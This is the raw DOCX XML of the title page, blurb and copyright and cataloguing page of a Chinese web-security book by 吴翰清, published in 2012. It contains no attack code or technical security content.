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right="-40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="fm" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5544311" cy="7897368"/>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5544311" cy="7897368"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="8740" w:h="12440"/>
          <w:pgMar w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sect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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="142"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="Publishing House of Electronics Industry" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="a扉页" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="白帽子讲Web安全" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>白帽子讲 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="376"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吴翰清 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>著</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1620593</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>132069</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029820" cy="233172"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3" name="image2.png" descr=""/>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2029820" cy="233172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="1782" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
        <w:t>Publishing House of Electronics Industry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="156"/>
        <w:ind w:left="0" w:right="389" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>北京</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="3"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:position w:val="1"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>BEIJING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="109"/>
        <w:ind w:left="3788" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="组合 1" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="b版权页 11-474" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>内 容 简 介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="302" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="128" w:firstLine="367"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>在互联网时代，数据安全与个人隐私受到了前所未有的挑战，各种新奇的攻击技术层出不穷。如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>何才能更好地保护我们的数据？本书将带你走进 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>安全的世界，让你了解 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>安全的方方面面。黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>客不再变得神秘，攻击技术原来我也可以会，小网站主自己也能找到正确的安全道路。大公司是怎么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>做安全的，为什么要选择这样的方案呢？你能在本书中找到答案。详细的剖析，让你不仅能“知其然”，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>更能“知其所以然”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="302" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="217" w:firstLine="367"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本书是根据作者若干年实际工作中积累下来的丰富经验而写成的，在解决方案上具有极强的可操作性，深入分析了各种错误的解决方案与误区，对安全工作者有很好的参考价值。安全开发流程与运营的介绍，对同行业的工作具有指导意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="302" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="3347" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>未经许可，不得以任何方式复制或抄袭本书之部分或全部内容。版权所有，侵权必究。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="119"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>图书在版编目（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="314" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="2842" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>白帽子讲 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>安全／吴翰清著</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>—北京：电子工业出版社，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2012.3 ISBN 978-7-121-16072-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="604" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="2640" w:hanging="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ⅰ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>①白… Ⅱ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>①吴… Ⅲ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>①计算机网络－安全技术 Ⅳ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>TP393.08 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>中国版本图书馆 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>数据核字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>025998 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="324" w:lineRule="auto" w:before="173"/>
        <w:ind w:left="203" w:right="6943" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>策划编辑：张春雨责任编辑：葛 娜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="745" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="7"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>印</w:t>
        <w:tab/>
        <w:t>刷：北京东光印刷厂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="745" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="292" w:lineRule="auto" w:before="51"/>
        <w:ind w:left="203" w:right="5685" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>装</w:t>
        <w:tab/>
        <w:t>订：三河市皇庄路通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>订厂出版发行：电子工业出版社</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="227" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="1093" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>北京市海淀区万寿路 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>173 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>信箱 邮编 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>100036</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="745" w:val="left" w:leader="none"/>
          <w:tab w:pos="2185" w:val="left" w:leader="none"/>
          <w:tab w:pos="2776" w:val="left" w:leader="none"/>
          <w:tab w:pos="3767" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="292" w:lineRule="auto" w:before="50"/>
        <w:ind w:left="203" w:right="3607" w:hanging="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>开</w:t>
        <w:tab/>
        <w:t>本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>787</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1092</w:t>
        <w:tab/>
        <w:t>1/16</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>印张：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>28</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>字数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>716</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>千字印</w:t>
        <w:tab/>
        <w:t>次：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2012 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-48"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>月第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
